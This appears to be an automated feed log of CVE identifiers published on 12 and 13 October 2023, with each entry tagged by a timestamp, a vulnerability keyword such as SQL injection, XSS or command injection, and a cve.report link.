2023-10-13 04:05:03.475311 (Remote Attack) CVE-2023-43149 https://cve.report/CVE-2023-43149
2023-10-13 05:05:02.784532 (Remote Attack) CVE-2023-43148 https://cve.report/CVE-2023-43148
2023-10-13 09:05:02.569968 (SQL injection) CVE-2023-41262 https://cve.report/CVE-2023-41262
2023-10-13 10:05:03.056309 (Critical) CVE-2023-44201 https://cve.report/CVE-2023-44201
2023-10-13 11:05:03.141152 (GitHub, XSS) CVE-2023-5564 https://cve.report/CVE-2023-5564
2023-10-13 17:05:02.565096 (SQL injection) CVE-2023-38250 https://cve.report/CVE-2023-38250
2023-10-13 17:05:02.578025 (SQL injection) CVE-2023-38249 https://cve.report/CVE-2023-38249
2023-10-13 17:05:02.630831 (SQL injection) CVE-2023-38221 https://cve.report/CVE-2023-38221
2023-10-13 17:05:02.644416 (XSS) CVE-2023-38219 https://cve.report/CVE-2023-38219
2023-10-13 19:05:03.559878 (GitHub) CVE-2023-5572 https://cve.report/CVE-2023-5572
2023-10-13 19:05:03.577169 (GitHub) CVE-2023-5571 https://cve.report/CVE-2023-5571
2023-10-13 20:05:02.352921 (WordPress, XSS) CVE-2023-38000 https://cve.report/CVE-2023-38000
2023-10-13 20:05:02.365880 (GitHub) CVE-2023-5573 https://cve.report/CVE-2023-5573
2023-10-13 21:05:02.567791 (WordPress) CVE-2023-39999 https://cve.report/CVE-2023-39999
2023-10-13 22:05:04.236063 (Execute Arbitrary code) CVE-2023-43079 https://cve.report/CVE-2023-43079
2023-10-13 23:05:02.789786 (Command Injection) CVE-2023-45467 https://cve.report/CVE-2023-45467
2023-10-13 23:05:02.836410 (Command Injection) CVE-2023-45466 https://cve.report/CVE-2023-45466
2023-10-13 23:05:02.864851 (Command Injection) CVE-2023-45465 https://cve.report/CVE-2023-45465
2023-10-13 23:05:02.878080 (SQL injection) CVE-2023-45162 https://cve.report/CVE-2023-45162
2023-10-13 23:05:02.931238 (GitHub, XSS) CVE-2023-4829 https://cve.report/CVE-2023-4829
2023-10-13 23:05:02.952286 (GitHub, XSS) CVE-2023-4517 https://cve.report/CVE-2023-4517
datetime subject id link
2023-10-12 01:05:02.559758 (Command Injection, Command Execution) CVE-2023-28381 https://cve.report/CVE-2023-28381
2023-10-12 02:05:02.326996 (Command Injection, Command Execution) CVE-2023-35194 https://cve.report/CVE-2023-35194
2023-10-12 02:05:02.346089 (Command Injection, Command Execution) CVE-2023-35193 https://cve.report/CVE-2023-35193
2023-10-12 02:05:02.364682 (Command Execution) CVE-2023-35056 https://cve.report/CVE-2023-35056
2023-10-12 02:05:02.380414 (Command Execution) CVE-2023-35055 https://cve.report/CVE-2023-35055
2023-10-12 02:05:02.439888 (Command Injection, Command Execution) CVE-2023-34356 https://cve.report/CVE-2023-34356
2023-10-12 02:05:02.456414 (XSS) CVE-2023-34354 https://cve.report/CVE-2023-34354
2023-10-12 02:05:02.469595 (Command Execution) CVE-2023-32632 https://cve.report/CVE-2023-32632
2023-10-12 02:05:02.526106 (Command Injection, Command Execution) CVE-2023-27380 https://cve.report/CVE-2023-27380
2023-10-12 02:05:02.540666 (Command Execution, Arbitrary Command) CVE-2023-24479 https://cve.report/CVE-2023-24479
2023-10-12 02:05:02.554867 (Command Execution) CVE-2023-34346 https://cve.report/CVE-2023-34346
2023-10-12 04:05:02.761485 (Remote Attack) CVE-2023-43960 https://cve.report/CVE-2023-43960
2023-10-12 05:05:02.972315 (Remote Attack, File Upload) CVE-2023-44962 https://cve.report/CVE-2023-44962
2023-10-12 05:05:03.030735 (Remote Attack, SQL injection) CVE-2023-44961 https://cve.report/CVE-2023-44961
2023-10-12 06:05:02.965774 (GitHub) CVE-2023-5535 https://cve.report/CVE-2023-5535
2023-10-12 06:05:03.029817 (Remote Code Execution) CVE-2023-35662 https://cve.report/CVE-2023-35662
2023-10-12 06:05:03.043982 (Remote Code Execution) CVE-2023-35649 https://cve.report/CVE-2023-35649
2023-10-12 06:05:03.058169 (Remote Code Execution) CVE-2023-35646 https://cve.report/CVE-2023-35646
2023-10-12 07:05:03.848874 (nginx) CVE-2023-45132 https://cve.report/CVE-2023-45132
2023-10-12 09:05:04.963895 (Remote Attack) CVE-2023-5486 https://cve.report/CVE-2023-5486
2023-10-12 09:05:05.026948 (Remote Attack) CVE-2023-5485 https://cve.report/CVE-2023-5485
2023-10-12 09:05:05.039819 (Remote Attack) CVE-2023-5484 https://cve.report/CVE-2023-5484
2023-10-12 09:05:05.052438 (Remote Attack) CVE-2023-5483 https://cve.report/CVE-2023-5483
2023-10-12 09:05:05.064841 (Remote Attack) CVE-2023-5481 https://cve.report/CVE-2023-5481
2023-10-12 09:05:05.129018 (Remote Attack) CVE-2023-5478 https://cve.report/CVE-2023-5478
2023-10-12 09:05:05.146032 (Remote Attack) CVE-2023-5476 https://cve.report/CVE-2023-5476
2023-10-12 09:05:05.160003 (Remote Attack) CVE-2023-5474 https://cve.report/CVE-2023-5474
2023-10-12 09:05:05.172404 (Remote Attack) CVE-2023-5473 https://cve.report/CVE-2023-5473
2023-10-12 09:05:05.232140 (Remote Attack, Critical) CVE-2023-5218 https://cve.report/CVE-2023-5218
2023-10-12 09:05:11.559962 (Samba) CVE-2023-3961 https://cve.report/CVE-2023-3961
2023-10-12 16:05:02.524602 (XSS) CVE-2023-32721 https://cve.report/CVE-2023-32721
2023-10-12 16:05:02.541501 (GitHub) CVE-2023-29453 https://cve.report/CVE-2023-29453
2023-10-12 16:05:02.557683 (Remote Attack) CVE-2023-40833 https://cve.report/CVE-2023-40833
2023-10-12 20:05:03.289741 (GitHub, XSS) CVE-2023-5555 https://cve.report/CVE-2023-5555
2023-10-12 21:05:03.173872 (SQL injection) CVE-2023-5045 https://cve.report/CVE-2023-5045
2023-10-12 21:05:03.186512 (GitHub, XSS) CVE-2023-5556 https://cve.report/CVE-2023-5556
2023-10-12 22:05:02.263674 (SQL injection) CVE-2023-23737 https://cve.report/CVE-2023-23737
2023-10-12 22:05:02.325173 (SQL injection) CVE-2023-23651 https://cve.report/CVE-2023-23651
2023-10-12 22:05:02.337695 (SQL injection) CVE-2023-5046 https://cve.report/CVE-2023-5046